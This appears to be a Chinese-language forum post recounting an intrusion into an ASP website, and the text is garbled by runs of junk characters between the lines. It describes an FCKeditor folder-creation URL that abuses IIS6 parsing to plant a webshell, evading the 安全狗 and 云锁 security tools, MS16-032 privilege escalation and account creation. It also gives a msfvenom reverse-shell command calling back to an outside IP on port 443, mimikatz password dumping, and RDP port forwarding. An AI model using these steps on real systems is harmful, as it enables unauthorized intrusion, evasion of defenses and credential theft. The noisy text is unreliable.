|
- O/ K1 H0 n* |' u0 v9 y 2 J4 `. n1 j' Y2 K: C% B" i
1 B% ~2 N( G& [8 ^1 l5 t* A
! q, l9 i5 p0 c i7 e* H
|
/ s. I: J' ^* C8 Q& Z- n 8 \8 P" T% @- l5 g
0 V) m$ J/ J0 S* M% [, u3 `" f
一、 利用getwebshell篇
" ^5 k+ e! T! B
5 { }0 v0 g9 w9 B+ t* W8 j
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
7 b9 {2 P) q6 B, Z
0 S5 A* |- W$ v
) R/ D* u$ ?2 c5 T% ^
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
& V) {& l: e9 O4 d# D# V! J. U
2 ^. G* p# a( u/ n2 x下面我们构造一个asp目录,如: - V( I5 [4 S- O1 E' {
! E0 M2 u: W" D& z4 ], a
& P2 c( g0 X4 I4 l2 I http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
( e* E; j! T- o- _* I$ b ) a/ h: U5 e& K( n
' [& j: x v1 b" ? 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
% \: Y$ X, h* D5 R1 M/ p/ y
) O9 J9 b9 ?. V+ j8 Y# |一、 绕过安全狗云锁提权并且加账号
4 K5 ~2 O6 D/ u
8 B) C. N" a6 n- Y' |( ~
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
# E9 n+ |3 g2 U0 v4 G% R
5 e8 }6 r- q# f6 B6 e/ ^如图:
3 z7 o" X [/ b; V+ M
9 j7 W/ j5 e8 j4 U. ?9 a r
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
& S- A) [5 s- j$ A& E- |8 w( g4 u3 e4 G
( R7 w7 z2 S, @* N一、 利用metasploit
- }( E* p' t! t
, O7 L3 a0 e* W8 b' s* c首先用pentestbox生成一个64位的payload如下命令
. `0 ?6 `, p; Z
1 L8 {' {5 j2 O& d3 l G5 v
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
3 x _1 X: }8 R! d- | ~9 ^
2 H3 m! f8 Y0 n5 Y为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
' z' w, }- G0 o5 E8 A+ Z
+ i |' a5 ~6 |7 f( @
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
+ {, k- e! ]: F+ `
2 u5 `0 f% d+ _
下面我们来做一个监听如下命令:
; U1 d: ?) f7 O/ X# v0 g7 ~8 h
+ x0 m; v% ], Z
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
2 V. {6 b5 H* S9 ]
 / m* o7 A/ {8 r: h
9 p* G. L# |' R0 W | 9 W- X9 S- ^, i
7 ~6 P( E- [7 U) P' P
& R- f4 T8 {4 [9 i/ h ' y1 p0 G" i8 l" c4 y( c
8 y9 k" r( W) ?! |
* v: G9 Y& Z. f( e' N1 B
: ?4 M( L9 S+ ?. F b& P
! }' b9 Z0 Q- L6 h7 p$ f! H& t
+ k* L8 H% v. o$ e. h/ g
. R F0 d! M7 h! z& H R* X+ D
4 p: L" ^5 _4 N
* w9 t+ J+ c% f- ^. ]% ?3 M, A. n% d4 W: T# c. V: @8 n* f
/ z- w; L' D$ {
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06